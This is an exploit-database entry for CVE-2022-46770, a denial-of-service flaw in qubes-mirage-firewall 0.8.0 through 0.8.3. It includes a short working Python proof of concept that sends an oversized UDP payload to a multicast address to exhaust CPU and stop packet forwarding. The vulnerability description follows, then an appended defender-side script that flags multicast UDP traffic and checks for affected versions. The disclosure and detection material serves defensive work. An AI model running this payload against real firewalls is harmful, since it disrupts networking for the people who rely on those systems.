Qubes Mirage Firewall 0.8.3 Denial Of Service

Qubes Mirage Firewall versions 0.8.0 through 0.8.3 suffer from a denial of service vulnerability.

Packet Storm
# Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)
# Date: 2022-12-04
# Exploit Author: Krzysztof Burghardt <krzysztof@burghardt.pl>
# Vendor Homepage: https://mirage.io/blog/MSA03
# Software Link: https://github.com/mirage/qubes-mirage-firewall/releases
# Version: >= 0.8.0 & < 0.8.4
# Tested on: Qubes OS
# CVE: CVE-2022-46770

# PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166

#!/usr/bin/env python3
from socket import socket, AF_INET, SOCK_DGRAM

TARGET = "239.255.255.250"
PORT = 5353
PAYLOAD = b'a' * 607

s = socket(AF_INET, SOCK_DGRAM)
s.sendto(PAYLOAD, (TARGET, PORT))

Related news

CVE-2022-46770: Mirage v0.8.x DoS from untrusted Qube by sending arbitrary UDP payload · Issue #166 · mirage/qubes-mirage-firewall

qubes-mirage-firewall (aka Mirage firewall for QubesOS) 0.8.x through 0.8.3 allows guest OS users to cause a denial of service (CPU consumption and loss of forwarding) via a crafted multicast UDP packet (IP address range of 224.0.0.0 through 239.255.255.255).
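A defender-side check for the two facts above, the affected version range and the multicast destination range. This is an added example, not code from the advisory or the qubes-mirage-firewall project; the function names, the sample addresses and the in-memory sample packets are constructed for illustration.

```python
import ipaddress
import struct

MULTICAST = ipaddress.ip_network("224.0.0.0/4")  # 224.0.0.0 through 239.255.255.255
AFFECTED_MIN, FIXED = (0, 8, 0), (0, 8, 4)       # ">= 0.8.0 & < 0.8.4" per the advisory


def is_affected(version: str) -> bool:
    """True if a version string such as 'v0.8.3' falls in the affected range."""
    parts = tuple(int(p) for p in version.lstrip("v").split("."))
    return AFFECTED_MIN <= parts < FIXED


def multicast_udp(packet: bytes):
    """Return (src, dst, dport, payload_len) for an IPv4 UDP datagram addressed
    to a multicast destination, or None for anything else (truncated input too)."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4                 # IPv4 header length in bytes
    if ihl < 20 or len(packet) < ihl + 8 or packet[9] != 17:  # 17 = UDP
        return None
    src = ipaddress.ip_address(packet[12:16])
    dst = ipaddress.ip_address(packet[16:20])
    if dst not in MULTICAST:
        return None
    _sport, dport, udp_len, _csum = struct.unpack("!HHHH", packet[ihl:ihl + 8])
    return str(src), str(dst), dport, udp_len - 8


def build_sample(src: str, dst: str, dport: int, payload: bytes) -> bytes:
    """Constructed test input: minimal IPv4+UDP packet, checksums left at zero."""
    udp = struct.pack("!HHHH", 40000, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     ipaddress.ip_address(src).packed,
                     ipaddress.ip_address(dst).packed)
    return ip + udp


if __name__ == "__main__":
    # Constructed samples: one multicast datagram, one ordinary unicast one.
    for pkt in (build_sample("10.137.0.20", "239.255.255.250", 5353, b"\x00" * 607),
                build_sample("10.137.0.20", "192.0.2.10", 53, b"\x00" * 32)):
        print(multicast_udp(pkt))
    print(is_affected("v0.8.3"), is_affected("0.8.4"))
```

Fed with packets captured on the firewall's client-facing interfaces, `multicast_udp` identifies which qube is emitting multicast UDP, while `is_affected` tells you whether the deployed firewall build still needs the upgrade to 0.8.4.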
